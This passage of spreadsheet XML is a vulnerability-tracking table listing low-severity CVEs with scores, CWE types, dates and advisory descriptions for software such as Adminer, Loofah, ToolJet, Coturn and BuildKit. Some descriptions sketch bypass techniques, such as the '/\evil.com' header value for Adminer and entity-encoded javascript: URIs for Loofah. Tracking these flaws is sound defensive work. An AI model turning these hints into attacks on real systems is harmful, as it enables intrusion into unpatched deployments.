      <c r="F5907" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5907" s="5" t="inlineStr"/>
      <c r="H5907" s="5" t="inlineStr"/>
      <c r="I5907" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J5907" s="5" t="inlineStr"/>
      <c r="K5907" s="5" t="inlineStr">
        <is>
          <t>CWE-131</t>
        </is>
      </c>
      <c r="L5907" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in popt. This vulnerability allows an attacker to provide specially crafted configuration content to a host, which, when loaded, can lead to a small memory corruption issue. This occurs because of an error in how the `poptConfigFileToString` function reallocates memory for buffers. Successful exploitation could result in heap metadata corruption, potentially causing the affected process to become unavailable (denial of service).</t>
        </is>
      </c>
      <c r="M5907" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18743</t>
        </is>
      </c>
    </row>
    <row r="5908">
      <c r="A5908" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5908" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45197</t>
        </is>
      </c>
      <c r="C5908" s="5" t="n">
        <v>2.5</v>
      </c>
      <c r="D5908" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5908" s="5" t="inlineStr"/>
      <c r="F5908" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5908" s="5" t="inlineStr"/>
      <c r="H5908" s="5" t="inlineStr"/>
      <c r="I5908" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5908" s="5" t="inlineStr"/>
      <c r="K5908" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L5908" s="5" t="inlineStr">
        <is>
          <t>Kernel software installed and running inside a Guest VM may post improper commands to the GPU Firmware to trigger a read and/or write data outside the Guest's virtualised GPU memory.
The firmware uses data provided by the Guest VM to set up accesses to memory. It validated this before use, but a TOCTOU bug was present which allowed the earlier check results to be invalidated.</t>
        </is>
      </c>
      <c r="M5908" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45197</t>
        </is>
      </c>
    </row>
    <row r="5909">
      <c r="A5909" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5909" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-0303</t>
        </is>
      </c>
      <c r="C5909" s="5" t="n">
        <v>2.4</v>
      </c>
      <c r="D5909" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5909" s="5" t="inlineStr"/>
      <c r="F5909" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5909" s="5" t="inlineStr">
        <is>
          <t>palo alto</t>
        </is>
      </c>
      <c r="H5909" s="5" t="inlineStr"/>
      <c r="I5909" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5909" s="5" t="inlineStr"/>
      <c r="K5909" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="L5909" s="5" t="inlineStr">
        <is>
          <t>A code execution vulnerability in Palo Alto Networks Checkov by Prisma® Cloud can allow arbitrary code execution when Checkov scans a directory that contains an attacker-controlled configuration file.</t>
        </is>
      </c>
      <c r="M5909" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-0303</t>
        </is>
      </c>
    </row>
    <row r="5910">
      <c r="A5910" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5910" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15418</t>
        </is>
      </c>
      <c r="C5910" s="5" t="n">
        <v>2.4</v>
      </c>
      <c r="D5910" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5910" s="5" t="inlineStr"/>
      <c r="F5910" s="5" t="inlineStr"/>
      <c r="G5910" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5910" s="5" t="inlineStr"/>
      <c r="I5910" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J5910" s="5" t="inlineStr"/>
      <c r="K5910" s="5" t="inlineStr">
        <is>
          <t>CWE-130</t>
        </is>
      </c>
      <c r="L5910" s="5" t="inlineStr">
        <is>
          <t>In the silabser.sys driver for CP210x devices v11.5.0 and earlier, a local unprivileged user with a malicious device can use malformed packets to leak up to 145 bytes of uninitialized kernel pool memory. This vulnerability affects Windows 10 and earlier.</t>
        </is>
      </c>
      <c r="M5910" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15418</t>
        </is>
      </c>
    </row>
    <row r="5911">
      <c r="A5911" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5911" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71438</t>
        </is>
      </c>
      <c r="C5911" s="5" t="n">
        <v>2.4</v>
      </c>
      <c r="D5911" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5911" s="5" t="inlineStr"/>
      <c r="F5911" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5911" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5911" s="5" t="inlineStr"/>
      <c r="I5911" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5911" s="5" t="inlineStr"/>
      <c r="K5911" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L5911" s="5" t="inlineStr">
        <is>
          <t>Mermaid is a JavaScript tool that uses Markdown-inspired text to create and modify diagrams and charts. Prior to 10.9.8 and 11.16.1, Mermaid's configuration setters (mermaid.initialize, mermaidAPI.setConfig, and mermaidAPI.updateSiteConfig) merge caller-supplied configuration into Mermaid's internal config using the assignWithDepth deep-merge helper, which is vulnerable to prototype pollution. This is only exploitable if an application forwards untrusted data directly into one of these configuration entry points, which is outside their documented usage; diagram-supplied configuration (e.g. %%{init: {}}%% or YAML frontmatter) is not affected. This issue is fixed in versions 10.9.8 and 11.16.1.</t>
        </is>
      </c>
      <c r="M5911" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71438</t>
        </is>
      </c>
    </row>
    <row r="5912">
      <c r="A5912" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5912" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80239</t>
        </is>
      </c>
      <c r="C5912" s="5" t="n">
        <v>2.4</v>
      </c>
      <c r="D5912" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5912" s="5" t="inlineStr"/>
      <c r="F5912" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5912" s="5" t="inlineStr"/>
      <c r="H5912" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5912" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5912" s="5" t="inlineStr"/>
      <c r="K5912" s="5" t="inlineStr">
        <is>
          <t>CWE-1258</t>
        </is>
      </c>
      <c r="L5912" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Exposure of Sensitive System Information Due to Uncleared Debug Information vulnerability. An unauthenticated attacker with physical access could potentially exploit this vulnerability, leading to information exposure.</t>
        </is>
      </c>
      <c r="M5912" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80239</t>
        </is>
      </c>
    </row>
    <row r="5913">
      <c r="A5913" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5913" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82874</t>
        </is>
      </c>
      <c r="C5913" s="5" t="n">
        <v>2.4</v>
      </c>
      <c r="D5913" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5913" s="5" t="inlineStr"/>
      <c r="F5913" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5913" s="5" t="inlineStr"/>
      <c r="H5913" s="5" t="inlineStr"/>
      <c r="I5913" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5913" s="5" t="inlineStr"/>
      <c r="K5913" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5913" s="5" t="inlineStr">
        <is>
          <t>ToolJet before v3.16.208 fails to validate that authenticated users belong to the organization specified in the organizationId path parameter of tooljet-db endpoints, allowing any Builder user to read, modify, and delete tables across tenant boundaries. Attackers can extract victim organization IDs from public app endpoints, then exploit schema operation endpoints to disclose table schemas, plant malicious tables, corrupt existing schemas, or permanently destroy victim data without any relationship to the target organization.</t>
        </is>
      </c>
      <c r="M5913" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82874</t>
        </is>
      </c>
    </row>
    <row r="5914">
      <c r="A5914" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5914" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89145</t>
        </is>
      </c>
      <c r="C5914" s="5" t="n">
        <v>2.4</v>
      </c>
      <c r="D5914" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5914" s="5" t="inlineStr"/>
      <c r="F5914" s="5" t="inlineStr"/>
      <c r="G5914" s="5" t="inlineStr"/>
      <c r="H5914" s="5" t="inlineStr"/>
      <c r="I5914" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J5914" s="5" t="inlineStr"/>
      <c r="K5914" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5914" s="5" t="inlineStr">
        <is>
          <t>Flextype CMS versions 0.9.9 through 1.0.0-alpha.3 fail to HTML-escape plugin directory names in the dependency error page rendered by getValidPluginsDependencies(). Attackers with write access to the plugins directory can create a plugin with HTML characters in its name to execute arbitrary scripts in users' browsers when dependency validation fails.</t>
        </is>
      </c>
      <c r="M5914" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89145</t>
        </is>
      </c>
    </row>
    <row r="5915">
      <c r="A5915" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5915" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10031</t>
        </is>
      </c>
      <c r="C5915" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5915" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5915" s="5" t="inlineStr"/>
      <c r="F5915" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5915" s="5" t="inlineStr"/>
      <c r="H5915" s="5" t="inlineStr"/>
      <c r="I5915" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J5915" s="5" t="inlineStr"/>
      <c r="K5915" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5915" s="5" t="inlineStr">
        <is>
          <t>SFTPGo prior to 2.7.4 contains a permission bypass vulnerability that allows authenticated users to circumvent per-directory access controls by creating symbolic links in a permitted directory that point to files in directories where download, upload, or overwrite permissions are denied. Attackers can exploit the create_symlinks permission combined with read and write access in one directory to read or modify files in restricted directories, as operations are authorized against the link's directory permissions rather than the dereferenced target's directory permissions.</t>
        </is>
      </c>
      <c r="M5915" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10031</t>
        </is>
      </c>
    </row>
    <row r="5916">
      <c r="A5916" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5916" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16434</t>
        </is>
      </c>
      <c r="C5916" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5916" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5916" s="5" t="inlineStr"/>
      <c r="F5916" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5916" s="5" t="inlineStr"/>
      <c r="H5916" s="5" t="inlineStr"/>
      <c r="I5916" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J5916" s="5" t="inlineStr"/>
      <c r="K5916" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L5916" s="5" t="inlineStr">
        <is>
          <t>Adminer 4.6.0 through 5.5.0 (fixed in 5.5.1) contains an incomplete fix for a prior X-Forwarded-Prefix vulnerability (GHSA-8478-xrj3-h9c2). The validation guard (bootstrap.inc.php) only rejects prefixes matching ^/[^/], blocking //evil.com but allowing values such as /\evil.com whose second character is a backslash. Because browsers normalize backslash to forward slash, a network-path reference survives into REQUEST_URI and reaches cookie_path(), affecting the Set-Cookie Path attribute. Exploitation requires that clients can set the X-Forwarded-Prefix header (a misconfigured or absent reverse proxy). Impact is limited to anomalous cookie-path scoping.</t>
        </is>
      </c>
      <c r="M5916" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16434</t>
        </is>
      </c>
    </row>
    <row r="5917">
      <c r="A5917" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5917" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46712</t>
        </is>
      </c>
      <c r="C5917" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5917" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5917" s="5" t="inlineStr"/>
      <c r="F5917" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5917" s="5" t="inlineStr"/>
      <c r="H5917" s="5" t="inlineStr"/>
      <c r="I5917" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J5917" s="5" t="inlineStr"/>
      <c r="K5917" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L5917" s="5" t="inlineStr">
        <is>
          <t>Misskey is an open source, federated social media platform. Versions 2025.3.2 and later, but prior to 2026.5.4, contain a vulnerability where a lack of proper permission checks allows access to certain data points from the Direct Messages (formerly Chat) feature, regardless of account permissions. This vulnerability occurs whether or not federation is enabled. Notes created with "specified" visibility (formerly "direct" visibility) are not affected. This issue has been fixed in version 2026.5.4.</t>
        </is>
      </c>
      <c r="M5917" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46712</t>
        </is>
      </c>
    </row>
    <row r="5918">
      <c r="A5918" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5918" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61712</t>
        </is>
      </c>
      <c r="C5918" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5918" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5918" s="5" t="inlineStr"/>
      <c r="F5918" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G5918" s="5" t="inlineStr"/>
      <c r="H5918" s="5" t="inlineStr"/>
      <c r="I5918" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5918" s="5" t="inlineStr"/>
      <c r="K5918" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L5918" s="5" t="inlineStr">
        <is>
          <t>BuildKit is a toolkit for converting source code to build artifacts in an efficient, expressive and repeatable manner. Prior to 0.31.1, BuildKit read attacker-controlled /etc/passwd and /etc/group files without an upper bound while resolving a username to a user identifier or group identifier in executor/oci/user.go and solver/llbsolver/ops/user_linux.go. A malicious base image or build could provide oversized files that exhausted memory during user resolution and caused out-of-memory termination of the buildkitd process. This issue is fixed in version 0.31.1.</t>
        </is>
      </c>
      <c r="M5918" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61712</t>
        </is>
      </c>
    </row>
    <row r="5919">
      <c r="A5919" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5919" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63641</t>
        </is>
      </c>
      <c r="C5919" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5919" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5919" s="5" t="inlineStr"/>
      <c r="F5919" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G5919" s="5" t="inlineStr"/>
      <c r="H5919" s="5" t="inlineStr"/>
      <c r="I5919" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J5919" s="5" t="inlineStr"/>
      <c r="K5919" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L5919" s="5" t="inlineStr">
        <is>
          <t>MagicMirror² is an open source modular smart mirror platform. Prior to 2.37.0, MagicMirror applies ipWhitelist only as Express middleware, while the Socket.IO server in js/server.js is attached directly to the HTTP server without equivalent IP allowlist, origin, or namespace authentication checks. In a documented non-loopback deployment that relies on ipWhitelist, an unauthenticated adjacent-network client can connect directly to module Socket.IO namespaces, and js/node_helper.js dispatches arbitrary events and payloads to socketNotificationReceived. The default newsfeed and calendar helpers can make server-side requests to attacker-selected URLs, while the default updatenotification helper can reach child_process.exec when a third-party module update is pending and the attacker supplies an update command through the socket CONFIG path. This can expose internal services, manipulate module-helper state, and conditionally execute commands. This issue is fixed in version 2.37.0.</t>
        </is>
      </c>
      <c r="M5919" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63641</t>
        </is>
      </c>
    </row>
    <row r="5920">
      <c r="A5920" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5920" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65655</t>
        </is>
      </c>
      <c r="C5920" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5920" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5920" s="5" t="inlineStr"/>
      <c r="F5920" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5920" s="5" t="inlineStr"/>
      <c r="H5920" s="5" t="inlineStr"/>
      <c r="I5920" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5920" s="5" t="inlineStr"/>
      <c r="K5920" s="5" t="inlineStr">
        <is>
          <t>CWE-614</t>
        </is>
      </c>
      <c r="L5920" s="5" t="inlineStr">
        <is>
          <t>When OAuth authentication is enabled and browser-facing TLS terminates at a reverse proxy that forwards the callback to Temporal UI Server over HTTP, affected versions derive authentication-cookie Secure attributes from the proxy-to-server connection. Temporal UI Server can therefore issue access-token cookies, and refresh-token cookies when provided by the identity provider, without Secure even though the browser completed login over HTTPS.
A victim who visits attacker-controlled content while a credential remains live may expose that credential only if the attacker can also steer traffic for the UI hostname, prevent the browser's HTTPS connection from succeeding, serve the hostname over HTTP, and read a later same-site plaintext request. A malicious website alone cannot read the cookie, and passive observation of a successful TLS connection is insufficient. Effective HSTS, a blocking HTTPS-only warning, or TLS re-encryption between the proxy and Temporal UI Server prevents the demonstrated disclosure path.
A recovered credential may be replayed within the victim's assigned permissions. Refresh-token replay additionally depends on the identity provider's issuance, expiry, rotation, and reuse-detection behavior.</t>
        </is>
      </c>
      <c r="M5920" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65655</t>
        </is>
      </c>
    </row>
    <row r="5921">
      <c r="A5921" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5921" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66000</t>
        </is>
      </c>
      <c r="C5921" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5921" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5921" s="5" t="inlineStr"/>
      <c r="F5921" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5921" s="5" t="inlineStr"/>
      <c r="H5921" s="5" t="inlineStr"/>
      <c r="I5921" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J5921" s="5" t="inlineStr"/>
      <c r="K5921" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L5921" s="5" t="inlineStr">
        <is>
          <t>Frappe is a full-stack web application framework. Prior to 16.23.0 and 15.112.0, Document Follow notification generation does not re-evaluate the recipient's current document permissions, allowing users whose access was revoked or reduced to continue receiving document data by email. This issue is fixed in versions 16.23.0 and 15.112.0.</t>
        </is>
      </c>
      <c r="M5921" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66000</t>
        </is>
      </c>
    </row>
    <row r="5922">
      <c r="A5922" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5922" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68554</t>
        </is>
      </c>
      <c r="C5922" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5922" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5922" s="5" t="inlineStr"/>
      <c r="F5922" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5922" s="5" t="inlineStr"/>
      <c r="H5922" s="5" t="inlineStr"/>
      <c r="I5922" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J5922" s="5" t="inlineStr"/>
      <c r="K5922" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-924</t>
        </is>
      </c>
      <c r="L5922" s="5" t="inlineStr">
        <is>
          <t>Coturn is a free open source implementation of TURN and STUN Server. Prior to 4.15.0, an on-path attacker can append attributes after MESSAGE-INTEGRITY to an authenticated STUN request on plain UDP or TCP, adjust the STUN header length, and recompute the unkeyed FINGERPRINT while the original HMAC remains valid because it covers only the message prefix. Server-side parsing in src/server/ns_turn_server.c continues past MESSAGE-INTEGRITY through handle_turn_allocate(), handle_turn_create_permission(), handle_turn_refresh(), and handle_turn_command(), allowing trailing LIFETIME, XOR-PEER-ADDRESS, or ORIGIN attributes to override allocation lifetime, inject a permission, or bypass the origin check. TLS and DTLS deployments prevent this in-transit modification. This issue is fixed in version 4.15.0.</t>
        </is>
      </c>
      <c r="M5922" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68554</t>
        </is>
      </c>
    </row>
    <row r="5923">
      <c r="A5923" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5923" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73087</t>
        </is>
      </c>
      <c r="C5923" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5923" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5923" s="5" t="inlineStr"/>
      <c r="F5923" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5923" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="H5923" s="5" t="inlineStr"/>
      <c r="I5923" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J5923" s="5" t="inlineStr"/>
      <c r="K5923" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L5923" s="5" t="inlineStr">
        <is>
          <t>Dozzle is a realtime log viewer for docker containers. From 10.5.2 until 10.6.15, the isBlockedIP SSRF guard in internal/notification/dispatcher/webhook.go, used by safeDialContext for webhook notification URLs, does not inspect IPv4 addresses embedded in 6to4, NAT64, Teredo, or IPv4-compatible IPv6 addresses, allowing an authenticated user to reach loopback or link-local targets that the guard intends to block. This issue is fixed in version 10.6.15.</t>
        </is>
      </c>
      <c r="M5923" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73087</t>
        </is>
      </c>
    </row>
    <row r="5924">
      <c r="A5924" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5924" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73491</t>
        </is>
      </c>
      <c r="C5924" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5924" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5924" s="5" t="inlineStr"/>
      <c r="F5924" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5924" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5924" s="5" t="inlineStr"/>
      <c r="I5924" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5924" s="5" t="inlineStr"/>
      <c r="K5924" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L5924" s="5" t="inlineStr">
        <is>
          <t>Loofah is a general library for manipulating and transforming HTML/XML documents and fragments, built on top of Nokogiri. From 2.25.0 until 2.25.2, Loofah::HTML5::Scrub.allowed_uri? does not reject javascript: URIs whose scheme is split or prefixed with the HTML5 named whitespace character references &amp;Tab; or &amp;NewLine;. CGI.unescapeHTML leaves those references intact, so allowed_uri? reports the URL safe even though a browser decodes and strips the tab or line feed and executes the resulting javascript: URL. This issue affects only callers that pass HTML-encoded strings directly to allowed_uri?; Loofah's default sanitize() path is not affected. This issue is fixed in version 2.25.2.</t>
        </is>
      </c>
      <c r="M5924" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73491</t>
        </is>
      </c>
    </row>
    <row r="5925">
      <c r="A5925" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5925" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73492</t>
        </is>
      </c>
      <c r="C5925" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5925" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5925" s="5" t="inlineStr"/>
      <c r="F5925" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5925" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5925" s="5" t="inlineStr"/>
      <c r="I5925" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5925" s="5" t="inlineStr"/>
      <c r="K5925" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-79</t>
        </is>
      </c>
      <c r="L5925" s="5" t="inlineStr">
        <is>
          <t>Loofah is a general library for manipulating and transforming HTML/XML documents and fragments, built on top of Nokogiri. From 2.25.0 until 2.25.2, Loofah::HTML5::Scrub.allowed_uri? does not reject javascript: or vbscript: URIs whose scheme is split by semicolon-less numeric character references such as &amp;#58, &amp;#9, &amp;#10, or &amp;#13. CGI.unescapeHTML leaves these references encoded, so allowed_uri? reports the URL safe even though a browser decodes an encoded colon or strips encoded whitespace and executes the resulting URI scheme. This issue affects only callers that pass HTML-encoded strings directly to allowed_uri?; Loofah's default sanitize() path is not affected. This issue is fixed in version 2.25.2.</t>
        </is>
      </c>
      <c r="M5925" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73492</t>
        </is>
      </c>
    </row>
    <row r="5926">
      <c r="A5926" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5926" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74797</t>
        </is>
      </c>
      <c r="C5926" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="D5926" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="E5926" s="5" t="inlineStr"/>
      <c r="F5926" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5926" s="5" t="inlineStr"/>
      <c r="H5926" s="5" t="inlineStr"/>
      <c r="I5926" s="5" t="inlineStr">
        <is>
          <t>2026-08-16</t>
        </is>
      </c>
      <c r="J5926" s="5" t="inlineStr"/>
      <c r="K5926" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L5926" s="5" t="inlineStr">
        <is>
          <t>OpenTofu versions before 1.11.4 contain a denial of service vulnerability in the tofu init command when processing maliciously-crafted .zip archives for provider or module packages. Attackers can cause excessive CPU usage by controlling .zip archive content served during dependency installation, degrading system performance and preventing timely completion of the init process.</t>
        </is>
      </c>
      <c r="M5926" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74797</t>
        </is>
      </c>
    </row>
    <row r="5927">
      <c r="A5927" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
